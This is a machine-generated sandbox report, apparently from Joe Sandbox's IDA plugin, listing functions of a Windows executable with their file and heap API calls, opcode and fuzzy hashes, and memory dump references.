Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog_wcscpy$_wcslen
String ID:
API String ID: 2067596392-0
Opcode ID: 2598a9dacd2fc00f060f7d24982327f35f9419a6a23a18333e7f943346b77831
Instruction ID: 95f7b5c4b22bdb37da16cc03627ecbf5dedd8582a01dd8c00b17b30a5a14e483
Opcode Fuzzy Hash: 2598a9dacd2fc00f060f7d24982327f35f9419a6a23a18333e7f943346b77831
Instruction Fuzzy Hash: D4113A7550A294EED701EBA4E8427DD7BB0EB0A318F10406FF445622C2CFBD0A94CB6E

Function 00401797 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040179C

Strings

CMT, xrefs: 00401805

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: d986000c6ca72751efd8321b82c4a240df430e88f70e5c814bb4354efc552f5c
Instruction ID: cb1905d03b2c7ebf80e1cc89add2cdc95a70797c28ece277fc4d9c4d8a9089db
Opcode Fuzzy Hash: d986000c6ca72751efd8321b82c4a240df430e88f70e5c814bb4354efc552f5c
Instruction Fuzzy Hash: 6B210571600544AFCB05EF2488909AEBBB8EF05314B00C06EF867773E2CB389E01CB69

Function 00401106 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 0040115B

Part of subcall function 00406381: __vswprintf_c_l.LIBCMT ref: 0040639F

Strings

Maximum allowed array size (%u) is exceeded, xrefs: 0040112C

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded
API String ID: 620378156-979119166
Opcode ID: dabfd28f0384f0a10da1ebac01ba713320d329a95fe551428d946b20711811d4
Instruction ID: 6c4186d6b9390bb0c66afba1aeba82a7a6e9864d1fa2952356ac7bfb653a8b50
Opcode Fuzzy Hash: dabfd28f0384f0a10da1ebac01ba713320d329a95fe551428d946b20711811d4
Instruction Fuzzy Hash: 37018F353007066FD728AA26D89193BB3D9EB88764310443FE99B97792EA39BC508718

Function 0040145F Relevance: 3.3, APIs: 2, Instructions: 259COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401464
_wcscpy.LIBCMT ref: 0040177D

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog_wcscpy
String ID:
API String ID: 2825759377-0
Opcode ID: e265fad0a277a2867074866266f66ac0263633a1b2de895241266d78b8477993
Instruction ID: 2ef6bc515ba2e0dc5db37b4040bb795630356917b528567fec6f9d7f401b2555
Opcode Fuzzy Hash: e265fad0a277a2867074866266f66ac0263633a1b2de895241266d78b8477993
Instruction Fuzzy Hash: B9A19170A00A84AFDB30DB74C8409AFBBE5AF45304F14496FE0A6E73A1D739AD41CB59

Function 004086BB Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,?,?,-00000011,?,0040850F,?,-00000011,?), ref: 0040873D
CreateFileW.KERNEL32(?,000000FF,?,00000000,00000002,00000000,00000000,?,?,00000800,?,?,?,-00000011,?,0040850F), ref: 00408772

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 263cb73657301cb08f0e55ef8fe29f69456dde35c25ab48d854be6bf91b498c3
Instruction ID: 29e4b0c4840c651442be05a52c5ac271f80886423710b7b6cc86d867a3c7bca3
Opcode Fuzzy Hash: 263cb73657301cb08f0e55ef8fe29f69456dde35c25ab48d854be6bf91b498c3
Instruction Fuzzy Hash: A521E171400708AEDB209F24CD41EEA7BA9EB04368F00853EF5D5A72D1CA799D999B58

Function 00408ABD Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 00408AD7
SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 00408B7E

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: c0a9dcd713e695108bdd44a2682f9f95ae8a9b81f2a0c449d301f472b703d208
Instruction ID: 7c12c14a7755126cd1b1099fbb01998f682996c6a8561fd0549d195c8dfa784e
Opcode Fuzzy Hash: c0a9dcd713e695108bdd44a2682f9f95ae8a9b81f2a0c449d301f472b703d208
Instruction Fuzzy Hash: B721C171600244AFCB11CF68C645BEE7BB4AF01300F18806EF895EB281DB78EA45CB58

Function 00401332 Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401337

Part of subcall function 00402C53: __EH_prolog.LIBCMT ref: 00402C58

_wcslen.LIBCMT ref: 004013D9

Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_wcslen
String ID:
API String ID: 2367413355-0
Opcode ID: ece96df32082121baa4e32b095fd113274a391476e9b0918afb84b839909b58d
Instruction ID: dc97035477e96816ceb155d1a7472f3588848a77665ef8f5161077bfe03452da
Opcode Fuzzy Hash: ece96df32082121baa4e32b095fd113274a391476e9b0918afb84b839909b58d
Instruction Fuzzy Hash: B321A131C0021AEBDF21AF95D801AEEBBB5EF09704F10802FF951B26A1C7394952DF99

Function 0040E449 Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040E44E

Part of subcall function 00401851: __EH_prolog.LIBCMT ref: 00401856
Part of subcall function 00401851: _memset.LIBCMT ref: 00401999
Part of subcall function 00401851: _memset.LIBCMT ref: 004019A8
Part of subcall function 00401851: _memset.LIBCMT ref: 004019B7

Part of subcall function 00401797: __EH_prolog.LIBCMT ref: 0040179C

_malloc.LIBCMT ref: 0040E4B6

Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: H_prolog_memset$AllocateHeap_malloc
String ID:
API String ID: 47157355-0
Opcode ID: c2279c2661c52e5bc04406100971ad100f30232522f7b6eca3b58c110daf14ee
Instruction ID: 6264913a76ec869d2d2fa857a6352ea683c0897fa8fb429f1b845d37f4e95463
Opcode Fuzzy Hash: c2279c2661c52e5bc04406100971ad100f30232522f7b6eca3b58c110daf14ee
Instruction Fuzzy Hash: 77213D72901218EBCF11EF96D8819EEBBB4BF49308F10456FE506B3391D7385A54CB69

Function 00408936 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408969
GetLastError.KERNEL32(?,?), ref: 00408976

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5947e9dc9062b13b14b755b9ca28fd0d3e60ad3149634ad75383f6cf314797db
Instruction ID: de43bb50fe4534e4eccb001886877135c10a45c62ef5b42f5ae08e6f60a1f5c5
Opcode Fuzzy Hash: 5947e9dc9062b13b14b755b9ca28fd0d3e60ad3149634ad75383f6cf314797db
Instruction Fuzzy Hash: E501F9B1701204BFD724AB798E4297B36ADDB84334714423FB592E33C1DA789D0152AB

Function 0040C0B2 Relevance: 3.0, APIs: 2, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

LoadStringW.USER32 ref: 0040C103
LoadStringW.USER32 ref: 0040C115

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: e3f0d2c0301668cb52b7570c93dd023f7b3c7b3dac79d8733f99470b967e0d9a
Instruction ID: a83cdb128feff8810628ead96f3a2cb9bc7cb8109f271ce783376fdc77cd7c0f
Opcode Fuzzy Hash: e3f0d2c0301668cb52b7570c93dd023f7b3c7b3dac79d8733f99470b967e0d9a
Instruction Fuzzy Hash: 53018132601214BFDA209B65AD85F577A9DDFCA350F10443EB610E32B1DA749C51876C

Function 00408CD3 Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,00000001,00000001,?,?,?,?,00408D59,00000001,00000001,00000000,?,00407B60,?,?), ref: 00408D26
GetLastError.KERNEL32(00408D59,00000001,00000001,00000000,?,00407B60,?,?,?,?,?,?,?,?,00000000,?), ref: 00408D32

Part of subcall function 00408B8B: __EH_prolog.LIBCMT ref: 00408B90

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ErrorFileH_prologLastPointer
String ID:
API String ID: 4236474358-0
Opcode ID: c827e5a8cbcf67cd03c467411b18680e8b7e2560071f396255d0efa49bcdfd70
Instruction ID: d33338dadb3570fd9343d0a75e572af542fff6185230e5d2940f610dd9ceff08
Opcode Fuzzy Hash: c827e5a8cbcf67cd03c467411b18680e8b7e2560071f396255d0efa49bcdfd70
Instruction Fuzzy Hash: 41018031100604EBCF248F14CE0479A37A4FFA0325F14473EF8A1A62D0DB78E951DA69

Function 0041A41A Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0041A434

Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75

__CxxThrowException@8.LIBCMT ref: 0041A479

Part of subcall function 00411CF0: std::exception::exception.LIBCMT ref: 00411CFA

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
String ID:
API String ID: 1264268182-0
Opcode ID: a8dac3d06ec195d75fcf40937f560bec599dd4ce8c76009c63905e723d33cbfb
Instruction ID: 2cbe6f0952810cab1b7a4c605eddcd8f63c12ae37312326ab4c0c0aefde95d50
Opcode Fuzzy Hash: a8dac3d06ec195d75fcf40937f560bec599dd4ce8c76009c63905e723d33cbfb
Instruction Fuzzy Hash: 6AF0E23164021932CF04B363EC0AADD37A46F4075CB10843BF914920A2DFFDAAD5818E

Function 00408E15 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00000000,771B3110,00000001,?,004090C5,00000000,?,?,004091A6,?,00000001,00000000,?,?), ref: 00408E30
SetFileAttributesW.KERNEL32(?,00000000,00000000,?,00000800,?,004090C5,00000000,?,?,004091A6,?,00000001,00000000,?,?), ref: 00408E5D

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 84f1e129171c9cbfa5f409367bc1ff56a2615d8611c997d8403947509a78202f
Instruction ID: 650244b6033713b21b11048f49edb8a9a08d679f9c0597073d4252fd729d8377
Opcode Fuzzy Hash: 84f1e129171c9cbfa5f409367bc1ff56a2615d8611c997d8403947509a78202f
Instruction Fuzzy Hash: B4F0A031151229BADF016E65CC01FDA3B5CAF083D8F088027BC84A7190DA75DDA5DAA8

Function 00408E6C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,-00000011,?,00408517,?,?,00000001,?,?,?,?,?,?,?,00000000), ref: 00408E84
DeleteFileW.KERNEL32(?,?,?,00000800,?,00408517,?,?,00000001,?,?,?,?,?,?,?), ref: 00408EAE

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5b7b6759fab871bd7404957b698212ebf33fe4af4b1e343a5a89e0ceb06479f1
Instruction ID: 1d1181cfb3c442f0c2b3915a874c33f451573b40ca55d1bda343f94b2a61534f
Opcode Fuzzy Hash: 5b7b6759fab871bd7404957b698212ebf33fe4af4b1e343a5a89e0ceb06479f1
Instruction Fuzzy Hash: 6DE0ED31552229A6DB00AA60CC01BDB3B9CAF083D1F084077BC80E3294DA75DC948AA9

Function 004109C9 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_clock.LIBCMT ref: 004109D9

Part of subcall function 0041C29B: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,004109EA,?,?,0040B874,00000000,?,?,00412073,?,?,?), ref: 0041C2A7
Part of subcall function 0041C29B: __aulldiv.LIBCMT ref: 0041C2D8

_clock.LIBCMT ref: 004109E5

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Time_clock$FileSystem__aulldiv
String ID:
API String ID: 3318706034-0
Opcode ID: f986b46ae22b52a4316d48ee12188aa9fdaf895018720f5250c2318da952bd18
Instruction ID: 286ba2fe7c3b0c2ef38476bb6faa1b929c2cc4fce2c5d26ce4296f7af4448982
Opcode Fuzzy Hash: f986b46ae22b52a4316d48ee12188aa9fdaf895018720f5250c2318da952bd18
Instruction Fuzzy Hash: 7EE0A035A0022066D72177B7B9063EE7B657B9639CF0405BFE441922A2DBBC08C25A2D

Function 0040DAF0 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0040DB1E
SetDlgItemTextW.USER32(00000065,?), ref: 0040DB35

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 5fec1140487ca1c736cafc36fabda8fb0bb0e2233318993054084298f629e3ab
Instruction ID: 311f314f8756c2e19301a91120922c5cc2ddf62e6e9c94aa540ea9938f79ff04
Opcode Fuzzy Hash: 5fec1140487ca1c736cafc36fabda8fb0bb0e2233318993054084298f629e3ab
Instruction Fuzzy Hash: 60F0E53191030876EB11FBA18C47F9A3A689705789F04057BB601B60E2E679A9708BAA

Function 00408DC9 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00409036,?,004065BF,?,?,?,?), ref: 00408DE1
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,00409036,?,004065BF,?,?,?,?), ref: 00408E09

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c25cc873939ac4405c65f46b02c83e86188fc4c1d62e607194c8f75a8fe2266f
Instruction ID: 2dfbdbc87525756de27a7cff900a7096c0f9eac0dcd58dd49e0796e607ac8402
Opcode Fuzzy Hash: c25cc873939ac4405c65f46b02c83e86188fc4c1d62e607194c8f75a8fe2266f
Instruction Fuzzy Hash: 15E0923661011866CB10AAA9DC01FDA379DAB8C3B5F040577BA44E32D0DAB4DDD58FE9

Function 00410AE8 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,00410B24,00409D7C), ref: 00410AF5
GetProcessAffinityMask.KERNEL32(00000000), ref: 00410AFC

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

